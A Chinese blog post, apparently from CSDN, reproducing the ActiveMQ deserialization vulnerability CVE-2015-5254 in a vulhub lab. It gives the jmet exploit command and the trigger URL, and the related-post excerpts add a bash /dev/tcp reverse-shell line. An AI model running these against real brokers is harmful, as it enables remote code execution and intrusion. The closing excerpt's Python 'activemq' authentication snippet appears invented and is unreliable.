ActiveMQ 反序列化漏洞 (CVE-2015-5254)漏洞复现

最新推荐文章于 2024-12-16 11:55:03 发布
最新推荐文章于 2024-12-16 11:55:03 发布
阅读量653 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: activemq 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/chenming08/article/details/130391100

当前漏洞环境部署在vulhub,当前验证环境为vulhub靶场(所有实验均为虚拟环境)
实验环境:攻击机----kali
靶机:centos7
需要的jar包:jmet-0.1.0-all.jar
1、启动docker,进入vulhub(靶机)
在这里插入图片描述
2、进入CVE-2015-5254环境(靶机)
在这里插入图片描述
3、启动环境(靶机)
在这里插入图片描述
4、查看进程(靶机)
在这里插入图片描述
5、下载jmet-0.1.0-all.jar(时间较长):https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar(攻击机)
在这里插入图片描述
6、执行java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y “touch /tmp/sucess” -Yp ROME 你的IP 61616(攻击机)
在这里插入图片描述在这里插入图片描述
7、访问控制台:http://你的IP:8161/admin/browse.jsp?JMSDestination=event
触发
在这里插入图片描述
8、进入容器,docker exec -it cve-2015-5254_activemq_1 /bin/bash(靶机)
success 已成功创建,表明漏洞利用成功:
在这里插入图片描述

千其昂cm
关注
漏洞复现ActiveMQ反序列化漏洞(CVE-2015-5254)
晚风不及你
01-05 760
Apache ActiveMQ是Apache软件基金会所研发的开放源代码消息中间件。ActiveMQ是消息队列服务,是面向消息中间件(MOM)的最终实现,它为企业消息传递提供高可用、出色性能、可扩展、稳定和安全保障。
阿一网络安全学院课堂作业——ActiveMQ 反序列化漏洞 (CVE-2015-5254)
Ayixy的博客
05-24 964
ActiveMQ模块 ,-s 是选择ysoserial payload ,-Y 是攻击模式和内容, -Yp 是选择攻击利⽤链,这是。【命令解释】:调⽤java -jar 运⾏ jmetjar包,-Q是插⼊⼀个名为event的队列,-I 是选择装载。阿⾥云ip为公⽹,公⽹⽆法找到内⽹ip,所以不成。使⽤命令:nmap -p- -A -O 192.168.110.145(需切换到root在执⾏)3.没有查看队列所有消息的⽤户名和密码下,只能管理员/⽤户去点击我们插⼊的消息才能触发(⽐较鸡。
ActiveMQ 反序列化漏洞复现(CVE-2015-5254)
m0_59839948的博客
09-05 1833
广东东软学院的学生,web安全技术漏洞复现可以参考
ActiveMQ反序列化漏洞CVE-2015-5254复现
Cwillchris的博客
03-31 7864
准备两个linux虚拟机,一个为目标机(,以下简称A,ip:192.168.98.30),一个为攻击机(以下简称B,ip:192.168.98.70) 先搭建靶场,打开A,教程在这里vulhub靶场搭建及漏洞复现教程_Cwillchris的博客-优快云博客 服务器A的生产端口(即用户可访问端口)为61616,管理端端口(后台)为8161 打开A 1、进入该漏洞环境所在目录 cd /root/desktop/vulhub/activemq/CVE-2015-5254 2、启动docker
ActiveMQ 反序列化漏洞 (CVE-2015-5254) 漏洞复现
wswr的博客
03-04 1306
前提环境(我是照着这个师傅来的):kali下搭建Vulhub靶场(详细附图)_看我的眼色行事的博客-优快云博客_kali搭建靶场 原理:Apache ActiveMQ 5.x 5.13.0 之前的安全漏洞,程序造成的漏洞不限制代理中可以序列化的类。远程攻击者可以使一个特殊的序列化 Java 消息服务 (JMS) ObjectMessage 对象利用此漏洞执行任意代码。 Active MQ 理解成一种apache上的服务,作用的是提供程序通信的服务。那么我的感觉就是这个漏洞可以理解成,这个代理服务在帮忙
ActiveMQ 反序列化漏洞 (CVE-2015-5254)复现
qq_45314073的博客
09-16 1562
ActiveMQ 反序列化漏洞
ActiveMQ 反序列化漏洞(CVE-2015-5254)复现
baidu_38844729的博客
01-22 605
前言 Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码 步骤 搭建环境:docker+vulhub 1.下载jmetjar文件,并在同目录下创建一个external文件夹 链接:https://g...
ActiveMQ 反序列化漏洞CVE-2015-5254)利用工具
08-15
2015年,ActiveMQ被发现存在一个严重的安全漏洞,被称为CVE-2015-5254,这是一个反序列化漏洞,允许攻击者通过精心构造的恶意消息来执行任意代码,从而对目标系统造成重大威胁。 反序列化漏洞通常发生在对象从...
漏洞复现---- ActiveMQ 反序列化漏洞CVE-2015-5254
qq_43168364的博客
09-04 795
一、简介 Apache ActiveMQ是老外所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。该漏洞源于程序没有限制可在代理中序列化的类。攻击者可以借助特制的序列化的java消息服务(JMS)ObjectMessage对象利用该漏洞执行恶意代码。 漏洞影响的版本为:Apache ActiveMQ 5.13.0之前的版本。 二、漏洞环境准备 pull下来内容 环境运行后,将监听61616和8161两个端口。其中61616是工作端口,消息在这个端口进行传递
ActiveMQ反序列化漏洞CVE-2015-5254复现
qq_40708881的博客
12-10 407
ActiveMQ反序列化漏洞CVE-2015-5254复现 导语 Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。 Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。 漏洞环境 git
ActiveMQ 反序列化漏洞CVE-2015-5254复现
weixin_42786460的博客
12-16 1490
ActiveMQ 反序列化漏洞CVE-2015-5254复现
CVE-2015-5254(ActiveMQ反序列化漏洞复现)
Sea_Sand息禅
07-13 3024
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。由于ActiveMQ是一个纯Java程序,因此只需要操作系统支持Java虚拟机,ActiveMQ便可执行。 Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者...
Apache ActiveMQ序列化漏洞(CVE-2015-5254)复现
WY92139010的博客
08-06 495
Apache ActiveMQ序列化漏洞(CVE-2015-5254)复现 一、漏洞描述 该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。 二、漏洞影响版本 Apache ActiveMQ 5.13.0之前的版本 三、漏洞环境搭建 1、官网下载ActiveMQ 5.11....
ActiveMQ反序列化漏洞 getshell(CVE-2015-5254)——漏洞复现
W小哥
11-10 3883
一、ActiveMQ介绍 1.1 简介 Apache的一款JAVA开源消息中间件,支持Java消息服务、集群、SpringFrameword等。属于消息队列组件。 (消息队列组件:分布式系统中的重要组件,主要解决应用耦合、异步消息、流量削峰等) 1.2 漏洞影响版本 Apache ActiveMQ < 5.13.0 之前 5.x版本 1.3 漏洞成因 漏洞没有限制在代理中序列化的类,远程攻击者可以借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行恶意代码。 1.
CVE-2015-5254ActiveMQ 反序列化漏洞复现
p_utao的博客
03-19 503
漏洞介绍 Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。Apache ActiveMQ5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。 漏洞复现 http://10.7.10.41:8161/admin 默认账号密码:admin 登陆成功
【vulhub漏洞复现CVE-2015-5254 ActiveMQ反序列化漏洞
RexHa的博客
02-26 2283
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。
CVE-2015-5254复现学习
shierbai的博客
05-18 761
使用[jmet](https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar)进行漏洞利用。影响版本:Apache ActiveMQ 5.13.0之前5.x版本,https://www.cvedetails.com/cve/CVE-2015-5254/实际环境下,需要诱导管理员点击我们构造的url去做访问,触发反弹条件。bash -i>/dev/tcp/攻击机ip/1234(监听端口) 0>&1
【vulhub漏洞复现ActiveMQ 反序列化漏洞 (CVE-2015-5254)-01
书山上的云的博客
01-10 4565
一、漏洞描述 Apache ActiveMQ 是由美国阿帕奇(Apache)软件基金会开发的开源消息中间件,支持 Java 消息服务、集群、Spring 框架等。属于消息队列组件(消息队列组件:分布式系统中的重要组件,主要解决应用耦合、异步消息、流量削峰等)。 二、漏洞成因 Apache ActiveMQ 5.13.0版本之前到5.x版本的安全漏洞,该程序引起的漏洞不限制代理中可以序列化的类。远程攻击者可以制作一个特殊的序列化 Java 消息服务 (JMS) ObjectMessage 对象,利用该漏洞执行
ActiveMQ CVE-2015-5254 分析
示例和笔记
06-07 480
ActiveMQ CVE-2015-5254漏洞是由于缺少对序列化数据的校验而导致,攻击者可以在序列化的数据中注入恶意代码。当 ActiveMQ 接收到该序列化数据并尝试反序列化时,将会执行这段恶意代码,从而实现攻击目的。具体来说,该漏洞的发生是由于 ActiveMQ 的两个缺陷导致。首先是方法中的缺陷,该方法将异常对象序列化为字节数组,这个字节数组包含了cause内的异常和message内的信息。攻击者可以构造精心设计的cause和message来注入恶意代码。接着,ActiveMQ 的与。
ActiveMQ 反序列化漏洞CVE-2015-5254
最新发布
12-28
### ActiveMQ 反序列化漏洞 CVE-2015-5254 的影响范围 Apache ActiveMQ 是一款由 Apache 软件基金会开发的开源消息中间件,广泛应用于分布式应用程序之间的通信。然而,在特定版本中存在严重的反序列化漏洞CVE-2015-5254),允许未经身份验证的远程攻击者通过特制的 Java 序列化数据包来执行任意命令。 受影响的具体版本为 5.x 版本至 5.13.0 之前的版本[^3]。这意味着如果部署了这些版本中的任何一个,默认情况下可能存在此安全隐患。 ### 修复方案 为了防止此类攻击的发生并保护系统免受潜在威胁: - **升级到最新稳定版**:最直接有效的解决办法是尽快将 ActiveMQ 升级到不受影响的安全版本,即至少更新至 5.13.0 或更高版本。 - **应用官方补丁**:对于无法立即进行全面升级的情况,可以考虑安装来自供应商发布的针对该问题的安全修补程序。 - **配置防火墙规则**:限制对 JMX 控制台和其他敏感端口的访问权限,仅允许可信 IP 地址连接。 ### 安全防护措施 除了上述提到的技术层面的操作外,还应采取一系列综合性的防御策略以增强整体安全性: - **最小特权原则**:确保运行 ActiveMQ 实例的服务账户具有尽可能少的权利和权限;关闭不必要的功能和服务组件。 - **定期审查日志文件**:监控异常活动迹象,及时发现可疑行为以便快速响应处理。 - **启用认证机制**:强制要求所有管理接口都经过强效的身份验证过程,避免使用弱密码组合,并建议采用多因素认证方式提高准入门槛。 - **隔离生产环境与测试环境**:保持两者之间严格的网络分隔状态,减少因误操作而导致的风险扩散可能性。 ```python # 示例代码展示如何设置基本的身份验证 from activemq import Broker, AuthenticationPlugin broker = Broker() auth_plugin = AuthenticationPlugin(username="admin", password="strong_password") broker.add_plugin(auth_plugin) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值